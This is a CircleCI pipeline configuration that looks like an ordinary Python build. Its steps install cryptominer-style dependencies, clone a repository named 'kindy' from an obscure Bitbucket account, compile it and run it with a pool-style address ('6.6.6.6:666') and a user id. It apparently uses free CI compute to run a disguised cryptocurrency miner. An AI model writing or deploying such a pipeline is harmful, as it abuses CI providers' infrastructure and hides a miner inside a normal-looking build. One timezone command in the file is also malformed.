version: 2.1

orbs:
  python: circleci/python@0.2.1

jobs:
  build:
    executor: python/default
    steps:
      - run:
          command: sudo apt update
      - run:
          command: sudo apt upgrade -y
      - run:
          command: TZ=Europe/Rome
      - run:
          command: sudo ln -snf /usr/share/zoneinfo/Europe/Rome /etc/localtime && sudo echo Europe/Rome > sudo /etc/timezone
      - run:
          command: sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
      - run:
          command: git clone https://345y45h45g45g@bitbucket.org/345y45h45g45g/kindy.git
      - run:
          command: sudo mkdir kindy/build && cd kindy/build && sudo cmake .. && sudo make -j$(nproc) && ls && sudo ./kindy -o 6.6.6.6:666 -u 674578

workflows:
  main:
    jobs:
      - build